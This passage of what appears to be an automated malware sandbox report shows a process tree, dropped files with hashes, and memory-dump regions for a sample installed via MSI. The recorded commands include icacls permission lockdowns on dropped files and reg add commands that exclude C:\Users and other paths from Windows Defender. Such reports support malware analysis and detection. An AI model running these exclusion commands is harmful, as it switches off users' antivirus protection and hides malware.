                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\DVc97R.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of WriteProcessMemory
                                        PID:4876
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\DVc97R.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:3512
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\DVc97R.exe" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:2264
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\DVc97R.exe" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:3244
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\image.png" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:2932
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\image.png" /inheritance:r
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:2320
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:2604
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:2228
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:4524
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:2012
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\thumbs.db" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:4320
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\thumbs.db" /inheritance:r
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:2956
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:3828
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:3804
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:2200
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:4436
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\XPSPLOG.dll" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:872
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\XPSPLOG.dll" /inheritance:r
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:5100
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:2460
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:1676
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\DVc97R\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:1868
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\DVc97R\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:4624
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:2400
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:2484
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe
                                    1⤵
                                      PID:4708
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:1712
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4816
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4532
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:1044
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4808
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4928
                                    • C:\Program Files (x86)\DVc97R\DVc97R.exe
                                      "C:\Program Files (x86)\DVc97R\DVc97R.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:3812
                                    • C:\Program Files (x86)\DVc97R\DVc97R.exe
                                      "C:\Program Files (x86)\DVc97R\DVc97R.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1980
                                    • C:\Program Files (x86)\2125W62dc\CGGyAg.exe
                                      "C:\Program Files (x86)\2125W62dc\CGGyAg.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:1700
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:5104
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4032
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:2076
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        2⤵
                                          PID:3880
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:2620
                                      • C:\Program Files (x86)\2125W62dc\CGGyAg.exe
                                        "C:\Program Files (x86)\2125W62dc\CGGyAg.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:1660
                                      • C:\Program Files (x86)\DVc97R\DVc97R.exe
                                        "C:\Program Files (x86)\DVc97R\DVc97R.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:4436

                                      Network

                                            MITRE ATT&CK Enterprise v16

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            e588e03.rbs

                                            • Path C:\Config.Msi\e588e03.rbs
                                            • Size 7KB
                                            • SHA256 a2b7f42e5f57ff591fb3d8798721ad26a639992a9a8ded951243a21868e717c2
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            XPSPLOG.dll

                                            • Path C:\Program Files (x86)\2125W62dc\XPSPLOG.dll
                                            • Size 4.6MB
                                            • SHA256 4e27d3875cbcc54bb5689eafc5e104c580bbdbc305fc2b4bad5c665d5bcacbf3
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            image.png

                                            • Path C:\Program Files (x86)\2125W62dc\image.png
                                            • Size 5.0MB
                                            • SHA256 d4b57be787368073e46c3a91b7c706e807a111d0e482bfdd7b18b89947051a29
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            DVc97R.exe

                                            • Path C:\Program Files (x86)\DVc97R\DVc97R.exe
                                            • Size 145KB
                                            • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            XPSPLOG.dll

                                            • Path C:\Program Files (x86)\DVc97R\XPSPLOG.dll
                                            • Size 4.6MB
                                            • SHA256 07fb383567180105b3a5938cf0dfed3e010e9ec8d5571afd40919fab805c4d9f
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            image.png

                                            • Path C:\Program Files (x86)\DVc97R\image.png
                                            • Size 5.0MB
                                            • SHA256 d80a334d0e55482a6f9f91335de6798771408280ca2cbc8214b9146054f5e32e
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            thumbs.db

                                            • Path C:\Program Files (x86)\DVc97R\thumbs.db
                                            • Size 358KB
                                            • SHA256 cc6a06dab12afd5165d684e5bafe80997c0d2988bb8e6ab30bdb9d170eca577a
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            __PSScriptPolicyTest_bicxgwlb.nyw.ps1

                                            • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bicxgwlb.nyw.ps1
                                            • Size 60B
                                            • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                            • MD5 SHA1 SHA512 TLSH

                                            UxEnhance64.dll

                                            • Path C:\Users\Public\CmbmfX\UxEnhance64.dll
                                            • Size 3.1MB
                                            • SHA256 87f8f88ffcdb24fadba6ae2cccabab91c9683a8ac031549cf475f83f0a37d8bc
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            adoresd.dat

                                            • Path C:\Users\Public\CmbmfX\adoresd.dat
                                            • Size 4.7MB
                                            • SHA256 868ae3f39c1706628e19fec99d2106c98432ead12ff924170de37cbd33388f7f
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            cORmam.exe

                                            • Path C:\Users\Public\CmbmfX\cORmam.exe
                                            • Size 135KB
                                            • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            msadox.tb

                                            • Path C:\Users\Public\CmbmfX\msadox.tb
                                            • Size 8KB
                                            • SHA256 b4f80afbdaf69371594ccf58bda62be4266dca28e46ccdf3e984a9c7bc77d31b
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            destopbak.ini

                                            • Path C:\Users\Public\Music\destopbak.ini
                                            • Size 2B
                                            • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                            • MD5 SHA1 SHA512

                                            MSI8F9A.tmp

                                            • Path C:\Windows\Installer\MSI8F9A.tmp
                                            • Size 8.8MB
                                            • SHA256 ce17d9a7cf9912bab137b888456a6fb2216851921fb009cb68b62c44548a6543
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            e588e02.msi

                                            • Path C:\Windows\Installer\e588e02.msi
                                            • Size 8.8MB
                                            • SHA256 97e0f91f71d4852b478bc260ee633a16312225696b04c678f771d6e462af34dd
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            metadata-2

                                            • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                            • Size 24.1MB
                                            • SHA256 c594501ac30855af0dee7e61fe9ab810fa68491d335fd318039a497a70333232
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            {951d760f-192f-49f8-86cf-18c2ff9f0017}_OnDiskSnapshotProp

                                            • Path \??\Volume{6e0928ee-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{951d760f-192f-49f8-86cf-18c2ff9f0017}_OnDiskSnapshotProp
                                            • Size 6KB
                                            • SHA256 ee308194f6d880e9eb67d5d03d52acfd5b157a0c028a8cfd1533d05f4d1cbc93
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            xxxx.ini

                                            • Path \??\c:\xxxx.ini
                                            • Size 2B
                                            • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                            • MD5 SHA1 SHA512

                                            memory/1216-43-0x00007FFB22D70000-0x00007FFB22D80000-memory.dmp

                                            memory/1216-18-0x00007FFB22D70000-0x00007FFB22D80000-memory.dmp

                                            memory/1216-15-0x00007FFB19390000-0x00007FFB199EF000-memory.dmp

                                            memory/1216-14-0x00007FFB37A50000-0x00007FFB37A52000-memory.dmp

                                            memory/1660-301-0x0000000072F80000-0x00000000736CA000-memory.dmp

                                            memory/1660-300-0x0000000000B60000-0x0000000000B61000-memory.dmp

                                            memory/1660-319-0x0000000000B60000-0x0000000000B61000-memory.dmp

                                            memory/1660-313-0x0000000003420000-0x0000000003C27000-memory.dmp

                                            memory/1660-312-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                                            memory/1660-308-0x0000000003420000-0x0000000003C27000-memory.dmp

                                            memory/1700-249-0x0000000072F80000-0x00000000736CA000-memory.dmp

                                            memory/1700-259-0x0000000000600000-0x0000000000601000-memory.dmp

                                            memory/1700-248-0x0000000000600000-0x0000000000601000-memory.dmp

                                            memory/1700-256-0x0000000002E50000-0x0000000003657000-memory.dmp

                                            memory/1700-253-0x0000000002E50000-0x0000000003657000-memory.dmp

                                            memory/1700-255-0x0000000000620000-0x0000000000621000-memory.dmp

                                            memory/1980-241-0x00000000012C0000-0x00000000012C1000-memory.dmp

                                            memory/1980-243-0x00000000753A0000-0x0000000075AEA000-memory.dmp

                                            memory/3148-278-0x00000000068A0000-0x00000000068D2000-memory.dmp

                                            memory/3148-279-0x000000006F6A0000-0x000000006F6EC000-memory.dmp

                                            memory/3148-266-0x0000000005C90000-0x0000000005CF6000-memory.dmp

                                            memory/3148-264-0x0000000005570000-0x0000000005B98000-memory.dmp

                                            memory/3148-263-0x0000000002D90000-0x0000000002DC6000-memory.dmp

                                            memory/3148-267-0x0000000005D00000-0x0000000005D66000-memory.dmp

                                            memory/3148-273-0x0000000005D70000-0x00000000060C4000-memory.dmp

                                            memory/3148-276-0x0000000006380000-0x000000000639E000-memory.dmp

                                            memory/3148-277-0x00000000063B0000-0x00000000063FC000-memory.dmp

                                            memory/3148-265-0x00000000054A0000-0x00000000054C2000-memory.dmp

                                            memory/3148-287-0x0000000006880000-0x000000000689E000-memory.dmp

                                            memory/3148-293-0x0000000007890000-0x00000000078A1000-memory.dmp

                                            memory/3148-288-0x0000000007610000-0x00000000076B3000-memory.dmp

                                            memory/3148-289-0x0000000007D40000-0x00000000083BA000-memory.dmp

                                            memory/3148-290-0x00000000076C0000-0x00000000076DA000-memory.dmp

                                            memory/3148-292-0x0000000007910000-0x00000000079A6000-memory.dmp

                                            memory/3148-291-0x0000000007700000-0x000000000770A000-memory.dmp

                                            memory/3812-233-0x0000000000E60000-0x0000000000E61000-memory.dmp

                                            memory/3812-234-0x00000000753A0000-0x0000000075AEA000-memory.dmp

                                            memory/4416-203-0x0000000010000000-0x0000000010061000-memory.dmp

                                            memory/4416-182-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

                                            memory/4416-225-0x0000000003370000-0x0000000003B77000-memory.dmp

                                            memory/4416-202-0x0000000003370000-0x0000000003B77000-memory.dmp

                                            memory/4416-198-0x0000000003370000-0x0000000003B77000-memory.dmp

                                            memory/4416-262-0x0000000003370000-0x0000000003B77000-memory.dmp

                                            memory/4416-194-0x00000000010A0000-0x00000000010B4000-memory.dmp

                                            memory/4416-187-0x0000000003370000-0x0000000003B77000-memory.dmp

                                            memory/4416-184-0x0000000003370000-0x0000000003B77000-memory.dmp

                                            memory/4416-230-0x0000000003370000-0x0000000003B77000-memory.dmp

                                            memory/4416-180-0x0000000003370000-0x0000000003B77000-memory.dmp

                                            memory/4416-176-0x00000000753A0000-0x0000000075AEA000-memory.dmp

                                            memory/4416-175-0x00000000007F0000-0x00000000007F1000-memory.dmp

                                            memory/4436-316-0x0000000001190000-0x0000000001191000-memory.dmp

                                            memory/4436-317-0x00000000037F0000-0x0000000003FF7000-memory.dmp

                                            memory/4436-321-0x0000000001170000-0x0000000001171000-memory.dmp

                                            memory/4436-310-0x00000000037F0000-0x0000000003FF7000-memory.dmp

                                            memory/4436-305-0x00000000753A0000-0x0000000075AEA000-memory.dmp

                                            memory/4436-304-0x0000000001170000-0x0000000001171000-memory.dmp

                                            memory/4864-84-0x000002242A8A0000-0x000002242A92A000-memory.dmp

                                            memory/4864-77-0x000002242A000000-0x000002242A891000-memory.dmp

                                            memory/4864-70-0x000002242A000000-0x000002242A891000-memory.dmp

                                            memory/4864-71-0x000002242A000000-0x000002242A891000-memory.dmp

                                            memory/4864-73-0x000002242A000000-0x000002242A891000-memory.dmp

                                            memory/4864-72-0x000002242A000000-0x000002242A891000-memory.dmp

                                            memory/4864-65-0x00007FFB37A60000-0x00007FFB37A62000-memory.dmp

                                            memory/4864-86-0x000002242A8A0000-0x000002242A92A000-memory.dmp

                                            memory/4864-66-0x000002242A000000-0x000002242A891000-memory.dmp

                                            memory/4864-85-0x000002242A8A0000-0x000002242A92A000-memory.dmp

                                            memory/4864-83-0x000002242A8A0000-0x000002242A92A000-memory.dmp

                                            memory/4864-63-0x000002242A000000-0x000002242A891000-memory.dmp

                                            memory/4864-58-0x00007FFB19510000-0x00007FFB19A2E000-memory.dmp

                                            memory/4864-57-0x00007FFB37A50000-0x00007FFB37A52000-memory.dmp

                                            memory/4864-82-0x0000022429560000-0x00000224295AE000-memory.dmp

                                            memory/4864-91-0x000002242A000000-0x000002242A891000-memory.dmp

                                            memory/4864-92-0x000002242A000000-0x000002242A891000-memory.dmp